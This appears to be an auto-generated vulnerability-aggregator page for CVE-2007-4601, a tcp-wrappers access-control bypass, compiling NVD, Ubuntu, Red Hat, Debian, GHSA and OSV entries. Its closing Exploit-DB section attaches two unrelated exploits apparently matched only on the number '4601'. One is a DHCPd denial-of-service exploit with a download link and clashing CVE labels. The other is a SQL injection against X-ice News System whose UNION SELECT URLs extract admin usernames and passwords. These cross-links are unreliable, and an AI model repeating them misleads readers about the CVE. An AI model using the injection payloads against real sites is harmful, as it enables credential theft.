CVE-2007-4601
published 2007-08-30CVE-2007-4601: A regression error in tcp-wrappers 7.6.dbs-10 and 7.6.dbs-11 might allow remote attackers to bypass intended access restrictions when a service uses libwrap…
PriorityP425medium5CVSS 2.0
AVNACLAuNCPINAN
EPSS
2.23%
81.3th percentile
A regression error in tcp-wrappers 7.6.dbs-10 and 7.6.dbs-11 might allow remote attackers to bypass intended access restrictions when a service uses libwrap but does not specify server connection information.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | tcp-wrappers | < tcp-wrappers 7.6.dbs-12 (bookworm) | tcp-wrappers 7.6.dbs-12 (bookworm) |
| ubuntu | ubuntu_linux | — | — |
CVSS provenance
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
osv5.0MEDIUM
vendor_debian5.0MEDIUM
vendor_redhat5.0MEDIUM
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Ubuntu
tcp-wrappers vulnerability
vendor_ubuntu·2007-08-29
CVE-2007-4601 tcp-wrappers vulnerability
Title: tcp-wrappers vulnerability
Summary: tcp-wrappers vulnerability
It was discovered that the TCP wrapper library was incorrectly allowing
connections to services that did not specify server-side connection
details. Remote attackers could connect to services that had been
configured to block such connections. This only affected Ubuntu Feisty.
Instructions: In general, a standard system upgrade is sufficient to effect the
necessary changes.
Red Hat
libwrap ignores rules under certain circumstances
vendor_redhat·2007-02-02·CVSS 5.0
CVE-2007-4601 [MEDIUM] libwrap ignores rules under certain circumstances
libwrap ignores rules under certain circumstances
A regression error in tcp-wrappers 7.6.dbs-10 and 7.6.dbs-11 might allow remote attackers to bypass intended access restrictions when a service uses libwrap but does not specify server connection information.
Statement: Not vulnerable. This issue was specific to a patch from Debian project and did not affect versions of tcp_wrappers packages as shipped with Red Hat Enterprise Linux.
Debian
CVE-2007-4601: tcp-wrappers - A regression error in tcp-wrappers 7.6.dbs-10 and 7.6.dbs-11 might allow remote ...
vendor_debian·2007·CVSS 5.0
CVE-2007-4601 [MEDIUM] CVE-2007-4601: tcp-wrappers - A regression error in tcp-wrappers 7.6.dbs-10 and 7.6.dbs-11 might allow remote ...
A regression error in tcp-wrappers 7.6.dbs-10 and 7.6.dbs-11 might allow remote attackers to bypass intended access restrictions when a service uses libwrap but does not specify server connection information.
Scope: local
bookworm: resolved (fixed in 7.6.dbs-12)
bullseye: resolved (fixed in 7.6.dbs-12)
forky: resolved (fixed in 7.6.dbs-12)
sid: resolved (fixed in 7.6.dbs-12)
trixie: resolved (fixed in 7.6.dbs-12)
GHSA
GHSA-36v6-mp2g-5c58: A regression error in tcp-wrappers 7
ghsa_unreviewed·2022-05-01
CVE-2007-4601 [MEDIUM] GHSA-36v6-mp2g-5c58: A regression error in tcp-wrappers 7
A regression error in tcp-wrappers 7.6.dbs-10 and 7.6.dbs-11 might allow remote attackers to bypass intended access restrictions when a service uses libwrap but does not specify server connection information.
OSV
CVE-2007-4601: A regression error in tcp-wrappers 7
osv·2007-08-30·CVSS 5.0
CVE-2007-4601 [MEDIUM] CVE-2007-4601: A regression error in tcp-wrappers 7
A regression error in tcp-wrappers 7.6.dbs-10 and 7.6.dbs-11 might allow remote attackers to bypass intended access restrictions when a service uses libwrap but does not specify server connection information.
No detection rules found.
Exploit-DB
Ubuntu 6.06 - DHCPd Remote Denial of Service
exploitdb·2007-11-02·CVSS 7.2
CVE-2008-5010 [HIGH] Ubuntu 6.06 - DHCPd Remote Denial of Service
Ubuntu 6.06 - DHCPd Remote Denial of Service
---
Ubuntu 6.06 DHCPd bug Remote Denial of Service Exploit
Author: RoMaNSoFt
Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/4601.tgz (1022007-DoS-CVE-2007-5365.tgz)
# milw0rm.com [2007-11-02]
Exploit-DB
X-ice News System 1.0 - 'devami.asp?id' SQL Injection
exploitdb·2007-03-13
CVE-2007-1570 X-ice News System 1.0 - 'devami.asp?id' SQL Injection
X-ice News System 1.0 - 'devami.asp?id' SQL Injection
---
Title : X-ice News System v1.0 Remote SQL Injection Vulnerability
#Author : CyberGhost
#Page : http://www.x-ice.org/haber%5Fv1/
#Download : http://aspindir.com/indir.asp?id=4601&sIslem=%DDndir
Vuln.
Username : /devami.asp?id=-1+union+select+0,kullaniciadi,2,3,4,5,6,7+from+admin
Password : /devami.asp?id=-1+union+select+0,sifre,2,3,4,5,6,7+from+admin
Login : /admin/kontrol.asp
Thanx : redLine - Hackinger - LiarHack - excellance - SaCReD SeeR - MaTRaX - by_emR3 - kerem125 - Bolivar - All TiTHaCK Members
And All TURKISH HACKERS !
# milw0rm.com [2007-03-13]
http://bugs.debian.org/405342http://osvdb.org/40140http://secunia.com/advisories/26567http://www.ubuntu.com/usn/usn-507-1https://exchange.xforce.ibmcloud.com/vulnerabilities/36364https://launchpad.net/bugs/135332http://bugs.debian.org/405342http://osvdb.org/40140http://secunia.com/advisories/26567http://www.ubuntu.com/usn/usn-507-1https://exchange.xforce.ibmcloud.com/vulnerabilities/36364https://launchpad.net/bugs/135332
2007-08-30
Published